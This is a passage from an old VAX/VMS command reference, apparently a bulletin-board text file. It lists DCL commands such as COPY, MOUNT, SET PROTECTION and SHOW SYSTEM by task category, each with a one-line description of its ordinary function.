  3182. EDIT              Creates (optionally) and edits a file.
  3183. EXAMINE           Displays the contents of memory.
  3184. LIBRARY           Creates or modifies various kinds of libraries.
  3185. LINK              Creates images from object modules.
  3186. MACRO             Creates object modules from macro source programs.
  3187. MESSAGE           Creates object modules from message source programs.
  3188. PATCH             Patches an image.
  3189. RUN               Runs an executable image.
  3190. SET COMMAND       Updates the commands available to the process.
  3191.  
  3192. -------------------------------------------------------------------------------
  3193. 6. Running executable images.
  3194.  
  3195. CANCEL            Cancels a scheduled wakeup request.
  3196. CONTINUE          Resumes execution of an interrupted command.
  3197. DEBUG             Invokes the VAX/VMS debugger after a CTRL/Y.
  3198. DEPOSIT           Changes the contents of memory.
  3199. EXAMINE           Displays the contents of memory.
  3200. EXIT              Terminates execution of an image or command procedure.
  3201. RUN               Runs an image.
  3202. SET COMMAND       Updates the commands available to the process.
  3203. STOP              Abruptly terminates execution of an image, process, or
  3204.                   command procedure.
  3205.  
  3206. -------------------------------------------------------------------------------
  3207. 7. Saving and cataloging information on storage devices.
  3208.  
  3209. APPEND            Appends one file to another.
  3210. COPY              Creates a copy of an existing file or files.
  3211. CREATE            Creates a new file.
  3212. DELETE            Deletes a file or files.
  3213. DIFFERENCES       Displays differences in content between two files.
  3214. DIRECTORY         Displays the names of the files in a directory.
  3215. EDIT              Creates (optionally) and edits a file.
  3216. MERGE             Merges sorted files.
  3217. PRINT             Prints the contents of a file.
  3218. PURGE             Deletes old versions of a file or files.
  3219. RENAME            Recatalogs an existing file.
  3220. SEARCH            Locates a character string within a file or files.
  3221. SORT              Sorts the data in a file.
  3222. TYPE              Displays the contents of a file.
  3223. SET DEFAULT       Changes the default device and directory.
  3224. SHOW DEFAULT      Displays the default device and directory.
  3225. ANALYZE/RMS_FILE  Analyzes the internal structure of a file.
  3226. CONVERT           Changes the attributes of a file.
  3227. CONVERT/RECLAIM   Reclaims unused space in an indexed file.
  3228. CREATE/DIRECTORY  Creates a new directory or subdirectory.
  3229. CREATE/FDL        Creates a new file with tailored attributes.
  3230. DUMP              Displays the uninterpreted contents of a file.
  3231. EDIT/FDL          Creates a file definition file.
  3232. EDIT/SUM          Updates a file with multiple files of edit commands.
  3233. EXCHANGE          Reformats files formatted by other operating systems.
  3234. LIBRARY           Creates or modifies various kinds of libraries.
  3235. RUNOFF            Formats one or more documents (text files).
  3236. SET DIRECTORY     Changes the characteristics of a directory.
  3237. SET FILE          Changes the characteristics of a file.
  3238. SET PROTECTION    Changes the protection of a file.
  3239. SET PROTECT/DEF   Changes the default protection given to files.
  3240. SET RMS_DEFAULT   Changes the default block and buffer count values.
  3241. SHOW PROTECTION   Displays the default protection.
  3242. SHOW QUOTA        Displays your quota of space on a disk volume.
  3243. SHOW RMS_DEFAULT  Displays the default block and buffer count values.
  3244. UNLOCK            Closes a file accidentally left open.
  3245.  
  3246. -------------------------------------------------------------------------------
  3247. 8. Using higher-level names in place of device and file names.
  3248.  
  3249. ASSIGN            Equates a logical name to an equivalence string.
  3250. CREATE/NAME_TABLE Creates a logical name table.
  3251. DEASSIGN          Deletes a logical name.
  3252. DEFINE            Equates a logical name to an equivalence string.
  3253. SHOW LOGICAL      Displays logical names and their equivalencies.
  3254. SHOW TRANSLATION  Displays a logical name and its first equivalence.
  3255.  
  3256. -------------------------------------------------------------------------------
  3257. 9. Using physical devices.
  3258.  
  3259. ALLOCATE          Allocates a device for your exclusive use.
  3260. DEALLOCATE        Releases an allocated device for general use.
  3261. DISMOUNT          Makes a storage device unavailable for processing.
  3262. INITIALIZE        Formats a storage device.
  3263. MOUNT             Makes a storage device available for processing.
  3264. ANALYZE/DISK      Checks the readability and validity of disks.
  3265. ANALYZE/ERROR_LOG Displays the contents of the system error log.
  3266. ANALYZE/MEDIA     Analyzes the format of a storage device.
  3267. BACKUP            Saves or restores files from storage devices.
  3268. SET CARD_READER   Sets the translation mode for a card reader.
  3269. SET DEVICE        Sets device characteristics.
  3270. SET MAGTAPE       Sets magnetic tape device characteristics.
  3271. SET PRINTER       Sets line printer characteristics.
  3272. SET PROTECT/DEV   Sets protection on a non-files device.
  3273. SET VOLUME        Sets mounted volume characteristics.
  3274. SHOW DEVICES      Displays the status of devices.
  3275. SHOW ERROR        Displays device error counts.
  3276. SHOW MAGTAPE      Displays magnetic tape characteristics.
  3277. SHOW PRINTER      Displays line printer characteristics.
  3278.  
  3279. -------------------------------------------------------------------------------
  3280. 10. Monitoring, maintaining, tuning, and trouble-shooting the system.
  3281.  
  3282. ACCOUNTING        Collects, records, and reports accounting information.
  3283. ANALYZE/CRASH     Analyzes a system dump.
  3284. ANALYZE/DISK      Checks the readability and validity of disks.
  3285. ANALYZE/ERROR_LOG Displays the contents of the system error log.
  3286. ANALYZE/MEDIA     Analyzes the format of a storage device.
  3287. ANALYZE/RMS_FILE  Analyzes the internal structure of a file.
  3288. ANALYZE/SYSTEM    Analyzes the running system.
  3289. BACKUP            Saves or restores files from storage devices.
  3290. MONITOR           Displays performance information on the running system.
  3291. REPLY             Displays a message on one or more terminal screens.
  3292. REQUEST           Displays a message on the operator's console.
  3293. SET ACCOUNTING    Initializes the accounting log file.
  3294. SET AUDIT         Enables auditing of security events.
  3295. SET COMMAND       Updates the commands available to the system.
  3296. SET DAY           Changes the day type.
  3297. SET LOGINS        Sets a limit on the number of interactive users.
  3298. SET TIME          Resets the system clock.
  3299. SHOW ERROR        Displays processor, memory, and device error counts.
  3300. SHOW MEMORY       Displays usage information on memory.
  3301. SHOW SYSTEM       Lists the processes on the running system.
  3302. SHOW USER         Lists the interactive users on the running system.
  3303.  
  3304. -------------------------------------------------------------------------------
  3305. 11. Manipulating your terminal-specific interactive environment
  3306.  
  3307. CONNECT           Connects a physical terminal to a virtual terminal.
  3308. DEFINE/KEY        Equates terminal function keys to command lines.
  3309. DELETE/KEY        Deletes a terminal function key definition.
  3310. DISCONNECT        Disconnects a physical terminal from a virtual terminal.
  3311. RECALL            Recalls previously entered interactive commands.
  3312. SET CONTROL       Controls the use of the CTRL/T and CTRL/Y keys.
  3313. SET HOST          Connects your terminal to another system via DECnet.
  3314. SET PROMPT        Sets the interactive command prompt.
  3315. SET TERMINAL      Sets terminal characteristics.
  3316. SHOW KEY          Displays one or more function key definitions.
  3317. SHOW TERMINAL     Displays terminal characteristics.
  3318.  
  3319. -------------------------------------------------------------------------------
  3320. 12. Examining and controlling the user environment.
  3321.  
  3322. SET COMMAND       Updates the commands available to the process.
  3323. SET CONTROL       Controls the use of the CTRL/T and CTRL/Y keys.
  3324. SET DEFAULT       Changes the default device and directory.
  3325. SET HOST          Connects your terminal to another system via DECnet.
  3326. SET MESSAGE       Overrides or supplements system messages.
  3327. SET PASSWORD      Changes your password.
  3328. SET PROCESS       Changes your process characteristics.
  3329. SET PROMPT        Sets the interactive command prompt.
  3330. SET PROTECT/DEF   Changes the default protection given to files.
  3331. SET RMS_DEFAULT   Changes the default block and buffer count values.
  3332. SET UIC           Changes the UIC of your process.
  3333. SET WORKING_SET   Changes your working set limit or quota.
  3334. SHOW DEFAULT      Displays the default device and directory.
  3335. SHOW KEY          Displays one or more function key definitions.
  3336. SHOW LOGICAL      Displays logical names and their equivalencies.
  3337. SHOW PROCESS      Displays your process characteristics.
  3338. SHOW PROTECTION   Displays the default protection.
  3339. SHOW QUOTA        Displays your quota of space on a disk volume.
  3340. SHOW RMS_DEFAULT  Displays the default block and buffer count values.
  3341. SHOW STATUS       Displays brief process characteristics.
  3342. SHOW SYMBOL       Displays the value of a symbol.
  3343. SHOW TERMINAL     Displays terminal characteristics.
  3344. SHOW TIME         Displays the current date and time.
  3345. SHOW TRANSLATION  Displays a logical name and its first equivalence.
  3346. SHOW WORKING_SET  Displays your working set limit and quota.
  3347.  
  3348. -------------------------------------------------------------------------------
  3349.  
  3350. Downloaded From P-80 Systems 304-744-2253
  3351.  
  3352.